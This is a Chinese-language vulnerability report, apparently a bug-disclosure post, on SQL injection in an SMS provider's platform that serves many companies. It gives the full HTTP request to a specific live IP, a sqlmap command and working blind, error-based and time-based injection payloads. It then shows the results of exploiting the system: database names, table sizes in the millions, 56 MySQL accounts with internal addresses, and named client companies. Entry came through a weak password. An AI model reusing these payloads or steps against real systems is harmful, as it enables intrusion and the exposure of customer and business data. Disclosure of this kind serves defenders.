[漏洞]某短信平台SQL注入(涉及数万各行业厂商)

一家短信提供商,影响涉及各行各业包括金融证券、酒店、医药、互联网等数十万企业的短信的发送记录、发送权限

注入点
POST  
http://211.147.239.62/Statistics/SumStatistics/GetSumDepartment?startTime=2015-01-25&endTime=2015-01-25&mstype=SMS&onTime=true HTTP/1.1  
Host: 211.147.239.62  
Connection: keep-alive  
Content-Length: 76  
Pragma: no-cache  
Cache-Control: no-cache  
Accept: application/json, text/javascript, */*; q=0.01  
Origin: http://211.147.239.62  
X-Requested-With: XMLHttpRequest  
DNT: 1  
Referer: http://211.147.239.62/Statistics/SumStatistics/Index  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6  
Cookie: 替换为登陆后的COOKIE  
MenusBlockIDs=10010,10011,10012,10013,10014,17000,12000,13000,14000,15000,18000,18200; ControllerName=SumStatistics

startTime=2015-01-25&endTime=2015-01-25&mstype=SMS&onTime=true  

./sqlmap.py -r header --threads 10 --dbs -batch

由之前扫到的弱口令,登陆进来后找到以下注入点:

Place: POST  
Parameter: startTime  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)  
Payload: startTime=-6517' OR (4508=4508)#&endTime=2015-01-25&mstype=SMS&on  
Time=true  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause  
Payload: startTime=2015-01-25' AND (SELECT 6733 FROM(SELECT COUNT(*),CONCAT(0x716c6f6371,(SELECT (CASE WHEN (6733=6733) THEN 1 ELSE 0 END)),0x716f697771,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '  
kjoG'='kjoG&endTime=2015-01-25&mstype=SMS&onTime=true  
Type: AND/OR time-based blind  
Title: MySQL > 5.0.11 AND time-based blind  
Payload: startTime=2015-01-25' AND SLEEP(5) AND 'JYnp'='JYnp&endTime=2015-  
01-25&mstype=SMS&onTime=true
漏洞证明

涉及16个数据库

#### DATABASES(16)

[*] 400_gsms

[*] 400_list

[*] commission

[*] gsms2_init

[*] gsms_init

[*] information_schema

[*] list2_init

[*] list_init

[*] mos2_gsms

[*] mos_gsms

[*] mos_gsms2_1

[*] mos_gsms_2

[*] mos_list2_1

[*] mysql

[*] performance_schema

[*] test

影响千万级数据

Database: mos_gsms2_1

+-------------------------------+---------+

| Table | Entries |

+-------------------------------+---------+

| gsms_msg_ticket | 4302497 |

| gsms_contact | 4191441 |

| gsms_statereport | 4031478 |

| gsms_deduct_record | 599589 |

| gsms_user_role | 360443 |

| gsms_user_role20130408 | 360110 |

| gsms_user_role20130409 | 360052 |

| gsms_msg_frame | 359263 |

| gsms_msg_pack | 241054 |

| gsms_non_white_list | 158632 |

| gsms_red_list | 124257 |

| gsms_account_carrier_price | 100360 |

| gsms_user | 58597 |

| gsms_user20130403 | 58523 |

| gsms_user20130401 | 58518 |

| gsms_user20130312 | 58275 |

| gsms_biztype_specnum | 53074 |

| gsms_enterprise_apply_detail | 49971 |

| gsms_user_business_type | 47656 |

| gsms_enterprise_specnum_bind | 39635 |

| gsms_user_account_bind | 33256 |

| gsms_business_type | 13511 |

| gsms_capital_account | 12545 |

| gsms_enterprise_apply | 12542 |
#### Users(56)

[*] 'cactiuser'@'192.168.10.89'

[*] 'censerver'@'192.168.10.89'

[*] 'censerver'@'localhost'

[*] 'chengxuan'@'192.168.%'

[*] 'chengxuan'@'localhost'

[*] 'innotop'@'192.168.10.83'

[*] 'monitor'@'192.168.10.89'

[*] 'monyog'@'192.168.%'

[*] 'monyog'@'localhost'

[*] 'moshengkuo'@'192.168.%'

[*] 'mscheck'@'127.0.0.1'

[*] 'mscheck'@'192.168.%'

[*] 'mscheck'@'localhost'

[*] 'private'@'192.168.10.86'

[*] 'private'@'localhost'

[*] 'program'@'172.16.200.10'

[*] 'program'@'172.16.202.101'

[*] 'program'@'172.16.202.102'

[*] 'program'@'172.16.202.203'

[*] 'program'@'183.232.65.44'

[*] 'program'@'192.168.%'

[*] 'program'@'192.168.10.100'

[*] 'program'@'192.168.10.101'

[*] 'program'@'192.168.10.102'

[*] 'program'@'192.168.10.103'

[*] 'program'@'192.168.10.104'

[*] 'program'@'192.168.10.120'

[*] 'program'@'192.168.10.150'

[*] 'program'@'192.168.10.151'

[*] 'program'@'192.168.10.188'

[*] 'program'@'192.168.10.223'

[*] 'program'@'192.168.10.68'

[*] 'program'@'192.168.10.81'

[*] 'program'@'192.168.10.84'

[*] 'program'@'192.168.10.86'

[*] 'program'@'192.168.10.87'

[*] 'program'@'192.168.10.88'

[*] 'program'@'192.168.10.92'

[*] 'program'@'192.168.10.93'

[*] 'program'@'192.168.10.96'

[*] 'program'@'192.168.10.97'

[*] 'program'@'192.168.10.98'

[*] 'program'@'localhost'

[*] 'repl'@'192.168.10.%'

[*] 'repl'@'192.168.10.130'

[*] 'root'@'%'

[*] 'root'@'192.168.%'

[*] 'root'@'localhost'

[*] 'super'@'192.168.%'

[*] 'super'@'192.168.10.86'

[*] 'super'@'localhost'

[*] 'wanglianguang'@'%'

[*] 'wanglianguang'@'192.168.%'

[*] 'wanglianguang'@'localhost'

[*] 'xiaozhuan'@'192.168.%'

[*] 'xiaozhuan'@'localhost'

从结果看应该所有产品数据库都在,光短信库用户就有50000多家,短信数量千万级。还有400等产品

涉及厂商(短信发送数较多的):【**银行】【东风悦达起亚】【安利中国】【BMW中国】【人人快递网】【中通物流】【我要旅行网】【娃哈哈集团】【GXG】【唯品会】【酷讯】等等

传送点